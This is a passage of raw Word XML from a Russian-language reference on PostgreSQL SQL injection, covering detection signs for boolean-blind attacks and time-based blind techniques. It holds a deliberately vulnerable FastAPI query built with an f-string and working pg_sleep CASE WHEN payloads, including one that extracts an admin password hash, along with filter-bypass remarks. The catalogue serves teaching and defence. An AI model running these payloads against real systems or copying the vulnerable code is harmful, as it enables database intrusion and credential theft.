          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_database()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>version()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_*</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> каталогам.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1F066B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: повторяющаяся форма с растущим </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6345FFED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>В access-логе: чередующиеся длины response body — короткий (пусто) и длинный (есть строки) — следуют друг за другом в ритме бинарного поиска.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7804C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5B6244" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3.1, 3.3.2, 3.2.3, 3.4.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED591BC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Conditional responses; HackTricks: PostgreSQL injection; OWASP: Blind SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1244BAA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Саммари категории 3.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B88A87" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как boolean primitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7474A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.3.2 Bit-by-bit extraction через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F66D199" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>3.3.3 Row-count канал через tautology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0683D41F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Использованные источники из research: нет — категория покрывается официальной документацией PostgreSQL и стандартными SQLi-cheat-sheet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D4E34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>3.4 Time-based blind</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5DE96C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.0 Обзор категории</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D0A77C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Time-based blind — последняя линия эскалации, когда закрыты UNION, error-based, HTTP-status oracle, row-count oracle. Атакующий заставляет сервер задержать ответ на N секунд при истинном условии и читает данные по различию latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B5EBF4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Концептуально это тот же </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-oracle, что в 3.3, только условие активирует не подмену row-count, а вызов </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Все техники extraction-а (бинарный поиск, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii()</w:t>
      </w:r>
      <w:r>
        <w:t>) переносятся из 3.3.2 без изменений — меняется только канал наблюдения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C29DA6A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Структура категории:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CACE820" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.1 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как базовый примитив.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105208BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.4.2 — амплификация через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>generate_series</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для оценок latency без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362610E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.3 — рекурсивный CTE как тяжёлая нагрузка, ещё один обход </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t>-фильтра.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D634A61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">3.4.4 — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> как пассивная защита и фактор моделирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15294AA0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Категория самая медленная из всех extraction-каналов: каждый бит ~N секунд (типично N=2–5). Bcrypt-хеш — порядка 20 минут даже с параллелизацией. Зато техника устойчива к большинству WAF, и единственный способ её нивелировать на стороне БД — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>statement_timeout</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C209871" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.4.1 `pg_sleep` в `CASE WHEN`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3985095B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep(seconds)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> блокирует backend на указанное время. Помещённый в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>THEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-ветку </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t>, он вызывается только при истинном условии.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC4CDE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1B5188" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F13C6F7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C4D59B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43A062" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.get("/products/{product_id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436C99DB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def get_product(product_id: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385740A0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, name, price FROM products WHERE id = {product_id}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0656FA58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with engine.begin() as conn:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CEA8A2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        result = await conn.execute(text(sql))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00281E34" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1B7215"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1DF44428" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Базовый oracle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE7810E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN current_user = 'app_user' THEN pg_sleep(3) ELSE pg_sleep(0) END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EDDB6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369C70F9"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current_user = 'app_user' THEN pg_sleep(3) ELSE pg_sleep(0) END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA6E2D7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Замечание про типы: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_sleep</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE id = void</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не приведётся — запрос упадёт с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>operator does not exist: integer = void</w:t>
      </w:r>
      <w:r>
        <w:t>. С точки зрения атакующего нужна задержка до того, как запрос упадёт. Если хочется чище:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F591889" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN current_user = 'app_user' THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780F3614"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current_user = 'app_user' THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9A9632" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Условие истинно: backend спит 3 секунды, latency ~3 + базовая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178102F6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Условие ложно: возвращает 1 мгновенно, latency базовая.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5B6884" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Боевой пример — побитовое извлечение:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC55EEE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(SELECT CASE WHEN ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 THEN (SELECT 1 FROM pg_sleep(3)) ELSE 1 END)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD7952C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Бинарный oracle через latency. 3 секунды над baseline 50–200 мс надёжно различимы. Для извлечения 60-байтного bcrypt-хеша при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>delay=3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>60 × 7 × 3 = 1260</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> секунд ≈ 21 минута последовательно. С параллелизацией — несколько минут.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B82821E"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pg_sleep(seconds)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> реализована через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
